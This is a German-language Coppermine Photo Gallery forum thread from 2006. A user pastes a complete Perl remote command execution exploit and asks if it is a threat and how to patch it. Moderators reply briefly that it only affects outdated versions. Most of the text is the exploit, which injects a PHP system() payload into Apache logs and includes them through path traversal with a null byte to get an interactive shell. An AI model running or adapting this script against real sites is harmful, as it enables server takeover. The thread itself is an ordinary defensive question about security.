coppermine exploit???? coppermine exploit????
 

News:

CPG Release 1.6.26
Correct PHP8.2 issues with user and language managers.
Additional fixes for PHP 8.2
Correct PHP8 error with SMF 2.0 bridge.
Correct IPTC supplimental category parsing.
Download and info HERE

Main Menu

coppermine exploit????

Started by derperle, December 09, 2006, 12:51:14 PM

Previous topic - Next topic

0 Members and 2 Guests are viewing this topic.

derperle

Hallo.
hier ein coppermine Exploit der im Netz rumschwirrt!!!
besteht eine Gefahr...  ??? ??? ???

#!/usr/bin/perl

use IO::Socket;
use LWP::Simple;

$| = print "
++++++++++++++++++++++++++++++++++++
+                                  +
+ Coppermine Photo Gallery 1.4.10  +
+                                  +
+ Remote Command Execution Exploit +
+                                  +
+         bd0rk || SOH-Crew        +
+                                  +
+         www.soh-crew.it.tt       +
+                                  +
++++++++++++++++++++++++++++++++++++

";

@apache=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);

if (@ARGV < 3)
{
$i = 0;
while($apache[$i])
{ print "[$i] $apache[$i]\n";$i++;}
exit();
}

$tar = $ARGV[0];
$dir = $ARGV[1];
$apachedir = $ARGV[2];

$inject="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"tar", PeerPort=>"80") or die "[-] Can't connect to Server\n\n";
print $socket "GET ".$dir.$inject." HTTP/1.1\r\n";
print $socket "User-Agent: ".$inject."\r\n";
print $socket "Host: ".$tar."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);

print "[shell] ";$cmd = <STDIN>;

while($cmd !~ "q") {
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "[RST] Could not connect to host.\n\n";

print $socket "GET ".$dir."thumbnails.php?lang=".$apache[$apachedir]."%00&cmd HTTP/1.1\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\n";

while ($serv = <$socket>)
{
print $serv;
}
print "[shell] ";
$cmd = <STDIN>;
}


kann man das Patchen???  Shocked Shocked

Danke im Voraus
Perle

Stramm

Wenn ich mich recht erinnere, dann ist das mit CPG 1.3.5 und während der 1.4 Betaphase behoben worden (~Sept. 2005)

Joachim Müller

#2
Korrekt: nur Uralt-Versionen sollten dadurch angreifbar sein. Einer der Gründe, warum wir immer wieder auf die Wichtigkeit von Updates hinweisen.

In Zukunft bitte keine Deutsch-sprachigen Threads im Englisch-sprachigen Teil des Forums starten. Nibbler hat Deinen Beitrag entsprechend verschoben.

derperle

Alles klar. Werd ich mir merken.
Dank für den Hinweis.

Perle